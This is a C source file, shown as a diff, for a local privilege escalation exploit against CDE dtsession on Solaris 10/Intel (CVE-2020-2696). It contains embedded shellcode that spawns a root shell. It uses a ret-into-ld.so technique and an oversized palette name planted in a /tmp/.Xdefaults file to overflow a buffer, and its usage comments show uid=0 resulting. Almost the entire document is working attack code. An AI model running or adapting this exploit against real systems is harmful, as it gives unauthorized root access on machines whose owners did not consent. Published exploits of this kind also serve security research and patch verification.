| 1 | + | /* |
| 2 | + | * raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel |
| 3 | + | * Copyright (c) 2019-2020 Marco Ivaldi <[email protected]> |
| 4 | + | * |
| 5 | + | * A buffer overflow in the CheckMonitor() function in the Common Desktop |
| 6 | + | * Environment 2.3.1 and earlier and 1.6 and earlier, as distributed with |
| 7 | + | * Oracle Solaris 10 1/13 (Update 11) and earlier, allows local users to gain |
| 8 | + | * root privileges via a long palette name passed to dtsession in a malicious |
| 9 | + | * .Xdefaults file (CVE-2020-2696). |
| 10 | + | * |
| 11 | + | * "I always loved Sun because it was so easy to own. Now with Solaris 11 I |
| 12 | + | * don't like it anymore." -- ~B. |
| 13 | + | * |
| 14 | + | * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack |
| 15 | + | * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory |
| 16 | + | * space, try returning to sprintf() instead of strcpy(). |
| 17 | + | * |
| 18 | + | * I haven't written a Solaris/SPARC version because I don't have a SPARC box |
| 19 | + | * on which Solaris 10 can run. If anybody is kind enough to give me access to |
| 20 | + | * such a box, I'd be happy to port my exploit to Solaris/SPARC as well. |
| 21 | + | * |
| 22 | + | * Usage: |
| 23 | + | * $ gcc raptor_dtsession_ipa.c -o raptor_dtsession_ipa -Wall |
| 24 | + | * [on your xserver: disable the access control] |
| 25 | + | * $ ./raptor_dtsession_ipa 192.168.1.1:0 |
| 26 | + | * [...] |
| 27 | + | * # id |
| 28 | + | * uid=0(root) gid=1(other) |
| 29 | + | * # |
| 30 | + | * |
| 31 | + | * Tested on: |
| 32 | + | * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13) |
| 33 | + | * [previous Solaris versions are also likely vulnerable] |
| 34 | + | */ |
| 35 | + | |
| 36 | + | #include <fcntl.h> |
| 37 | + | #include <link.h> |
| 38 | + | #include <procfs.h> |
| 39 | + | #include <stdio.h> |
| 40 | + | #include <stdlib.h> |
| 41 | + | #include <strings.h> |
| 42 | + | #include <unistd.h> |
| 43 | + | #include <sys/stat.h> |
| 44 | + | #include <sys/systeminfo.h> |
| 45 | + | #include <sys/types.h> |
| 46 | + | |
| 47 | + | #define INFO1 "raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel" |
| 48 | + | #define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi <[email protected]>" |
| 49 | + | |
| 50 | + | #define VULN "/usr/dt/bin/dtsession" // the vulnerable program |
| 51 | + | #define BUFSIZE 256 // size of the palette name |
| 52 | + | #define PADDING 3 // padding in the palette name |
| 53 | + | #define PAYSIZE 1024 // size of the payload |
| 54 | + | #define OFFSET env_len / 2 // offset to the shellcode |
| 55 | + | |
| 56 | + | char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */ |
| 57 | + | /* double setuid() */ |
| 58 | + | "\x31\xc0\x50\x50\xb0\x17\xcd\x91" |
| 59 | + | "\x31\xc0\x50\x50\xb0\x17\xcd\x91" |
| 60 | + | /* execve() */ |
| 61 | + | "\x31\xc0\x50\x68/ksh\x68/bin" |
| 62 | + | "\x89\xe3\x50\x53\x89\xe2\x50" |
| 63 | + | "\x52\x53\xb0\x3b\x50\xcd\x91"; |
| 64 | + | |
| 65 | + | /* globals */ |
| 66 | + | char *env[256]; |
| 67 | + | int env_pos = 0, env_len = 0; |
| 68 | + | |
| 69 | + | /* prototypes */ |
| 70 | + | int add_env(char *string); |
| 71 | + | void check_zero(int addr, char *pattern); |
| 72 | + | int search_ldso(char *sym); |
| 73 | + | int search_rwx_mem(void); |
| 74 | + | void set_val(char *buf, int pos, int val); |
| 75 | + | |
| 76 | + | /* |
| 77 | + | * main() |
| 78 | + | */ |
| 79 | + | int main(int argc, char **argv) |
| 80 | + | { |
| 81 | + | char buf[BUFSIZE], payload[PAYSIZE]; |
| 82 | + | char platform[256], release[256], display[256]; |
| 83 | + | int i, payaddr; |
| 84 | + | |
| 85 | + | char *arg[2] = {"foo", NULL}; |
| 86 | + | int sb = ((int)argv[0] | 0xfff); /* stack base */ |
| 87 | + | int ret = search_ldso("strcpy"); /* or sprintf */ |
| 88 | + | int rwx_mem = search_rwx_mem(); /* rwx memory */ |
| 89 | + | |
| 90 | + | FILE *fp; |
| 91 | + | char palette_file[BUFSIZE + 18]; |
| 92 | + | |
| 93 | + | /* print exploit information */ |
| 94 | + | fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); |
| 95 | + | |
| 96 | + | /* read command line */ |
| 97 | + | if (argc != 2) { |
| 98 | + | fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]); |
| 99 | + | exit(1); |
| 100 | + | } |
| 101 | + | sprintf(display, "DISPLAY=%s", argv[1]); |
| 102 | + | |
| 103 | + | /* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */ |
| 104 | + | memset(payload, '\x90', PAYSIZE); |
| 105 | + | payload[PAYSIZE - 1] = 0x0; |
| 106 | + | memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc)); |
| 107 | + | |
| 108 | + | /* fill the envp, keeping padding */ |
| 109 | + | add_env(payload); |
| 110 | + | add_env(display); |
| 111 | + | add_env("HOME=/tmp"); |
| 112 | + | add_env(NULL); |
| 113 | + | |
| 114 | + | /* calculate the payload address */ |
| 115 | + | payaddr = sb - OFFSET; |
| 116 | + | |
| 117 | + | /* prepare the evil palette name */ |
| 118 | + | memset(buf, 'A', sizeof(buf)); |
| 119 | + | buf[sizeof(buf) - 1] = 0x0; |
| 120 | + | |
| 121 | + | /* fill with function address in ld.so.1, saved eip, and arguments */ |
| 122 | + | for (i = PADDING; i < BUFSIZE - 16; i += 4) { |
| 123 | + | set_val(buf, i, ret); /* strcpy */ |
| 124 | + | set_val(buf, i += 4, rwx_mem); /* saved eip */ |
| 125 | + | set_val(buf, i += 4, rwx_mem); /* 1st argument */ |
| 126 | + | set_val(buf, i += 4, payaddr); /* 2nd argument */ |
| 127 | + | } |
| 128 | + | |
| 129 | + | /* prepare the evil .Xdefaults file */ |
| 130 | + | fp = fopen("/tmp/.Xdefaults", "w"); |
| 131 | + | if (!fp) { |
| 132 | + | perror("error creating .Xdefaults file"); |
| 133 | + | exit(1); |
| 134 | + | } |
| 135 | + | fprintf(fp, "*0*ColorPalette: %s\n", buf); // or *0*MonochromePalette |
| 136 | + | fclose(fp); |
| 137 | + | |
| 138 | + | /* prepare the evil palette file (badchars currently not handled) */ |
| 139 | + | mkdir("/tmp/.dt", 0755); |
| 140 | + | mkdir("/tmp/.dt/palettes", 0755); |
| 141 | + | sprintf(palette_file, "/tmp/.dt/palettes/%s", buf); |
| 142 | + | fp = fopen(palette_file, "w"); |
| 143 | + | if (!fp) { |
| 144 | + | perror("error creating palette file"); |
| 145 | + | exit(1); |
| 146 | + | } |
| 147 | + | fprintf(fp, "Black\n"); |
| 148 | + | fclose(fp); |
| 149 | + | |
| 150 | + | /* print some output */ |
| 151 | + | sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); |
| 152 | + | sysinfo(SI_RELEASE, release, sizeof(release) - 1); |
| 153 | + | fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); |
| 154 | + | fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); |
| 155 | + | fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); |
| 156 | + | fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr); |
| 157 | + | fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret); |
| 158 | + | |
| 159 | + | /* run the vulnerable program */ |
| 160 | + | execve(VULN, arg, env); |
| 161 | + | perror("execve"); |
| 162 | + | exit(0); |
| 163 | + | } |
| 164 | + | |
| 165 | + | /* |
| 166 | + | * add_env(): add a variable to envp and pad if needed |
| 167 | + | */ |
| 168 | + | int add_env(char *string) |
| 169 | + | { |
| 170 | + | int i; |
| 171 | + | |
| 172 | + | /* null termination */ |
| 173 | + | if (!string) { |
| 174 | + | env[env_pos] = NULL; |
| 175 | + | return env_len; |
| 176 | + | } |
| 177 | + | |
| 178 | + | /* add the variable to envp */ |
| 179 | + | env[env_pos] = string; |
| 180 | + | env_len += strlen(string) + 1; |
| 181 | + | env_pos++; |
| 182 | + | |
| 183 | + | /* pad the envp using zeroes */ |
| 184 | + | if ((strlen(string) + 1) % 4) |
| 185 | + | for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { |
| 186 | + | env[env_pos] = string + strlen(string); |
| 187 | + | env_len++; |
| 188 | + | } |
| 189 | + | |
| 190 | + | return env_len; |
| 191 | + | } |
| 192 | + | |
| 193 | + | /* |
| 194 | + | * check_zero(): check an address for the presence of a 0x00 |
| 195 | + | */ |
| 196 | + | void check_zero(int addr, char *pattern) |
| 197 | + | { |
| 198 | + | if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) || |
| 199 | + | !(addr & 0xff000000)) { |
| 200 | + | fprintf(stderr, "Error: %s contains a 0x00!\n", pattern); |
| 201 | + | exit(1); |
| 202 | + | } |
| 203 | + | } |
| 204 | + | |
| 205 | + | /* |
| 206 | + | * search_ldso(): search for a symbol inside ld.so.1 |
| 207 | + | */ |
| 208 | + | int search_ldso(char *sym) |
| 209 | + | { |
| 210 | + | int addr; |
| 211 | + | void *handle; |
| 212 | + | Link_map *lm; |
| 213 | + | |
| 214 | + | /* open the executable object file */ |
| 215 | + | if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { |
| 216 | + | perror("dlopen"); |
| 217 | + | exit(1); |
| 218 | + | } |
| 219 | + | |
| 220 | + | /* get dynamic load information */ |
| 221 | + | if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { |
| 222 | + | perror("dlinfo"); |
| 223 | + | exit(1); |
| 224 | + | } |
| 225 | + | |
| 226 | + | /* search for the address of the symbol */ |
| 227 | + | if ((addr = (int)dlsym(handle, sym)) == NULL) { |
| 228 | + | fprintf(stderr, "sorry, function %s() not found\n", sym); |
| 229 | + | exit(1); |
| 230 | + | } |
| 231 | + | |
| 232 | + | /* close the executable object file */ |
| 233 | + | dlclose(handle); |
| 234 | + | |
| 235 | + | check_zero(addr - 4, sym); |
| 236 | + | return addr; |
| 237 | + | } |
| 238 | + | |
| 239 | + | /* |
| 240 | + | * search_rwx_mem(): search for an RWX memory segment valid for all |
| 241 | + | * programs (typically, /usr/lib/ld.so.1) using the proc filesystem |
| 242 | + | */ |
| 243 | + | int search_rwx_mem(void) |
| 244 | + | { |
| 245 | + | int fd; |
| 246 | + | char tmp[16]; |
| 247 | + | prmap_t map; |
| 248 | + | int addr = 0, addr_old; |
| 249 | + | |
| 250 | + | /* open the proc filesystem */ |
| 251 | + | sprintf(tmp,"/proc/%d/map", (int)getpid()); |
| 252 | + | if ((fd = open(tmp, O_RDONLY)) < 0) { |
| 253 | + | fprintf(stderr, "can't open %s\n", tmp); |
| 254 | + | exit(1); |
| 255 | + | } |
| 256 | + | |
| 257 | + | /* search for the last RWX memory segment before stack (last - 1) */ |
| 258 | + | while (read(fd, &map, sizeof(map))) |
| 259 | + | if (map.pr_vaddr) |
| 260 | + | if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { |
| 261 | + | addr_old = addr; |
| 262 | + | addr = map.pr_vaddr; |
| 263 | + | } |
| 264 | + | close(fd); |
| 265 | + | |
| 266 | + | /* add 4 to the exact address NULL bytes */ |
| 267 | + | if (!(addr_old & 0xff)) |
| 268 | + | addr_old |= 0x04; |
| 269 | + | if (!(addr_old & 0xff00)) |
| 270 | + | addr_old |= 0x0400; |
| 271 | + | |
| 272 | + | return addr_old; |
| 273 | + | } |
| 274 | + | |
| 275 | + | /* |
| 276 | + | * set_val(): copy a dword inside a buffer (little endian) |
| 277 | + | */ |
| 278 | + | void set_val(char *buf, int pos, int val) |
| 279 | + | { |
| 280 | + | buf[pos] = (val & 0x000000ff); |
| 281 | + | buf[pos + 1] = (val & 0x0000ff00) >> 8; |
| 282 | + | buf[pos + 2] = (val & 0x00ff0000) >> 16; |
| 283 | + | buf[pos + 3] = (val & 0xff000000) >> 24; |
| 284 | + | } |
| 285 | + | |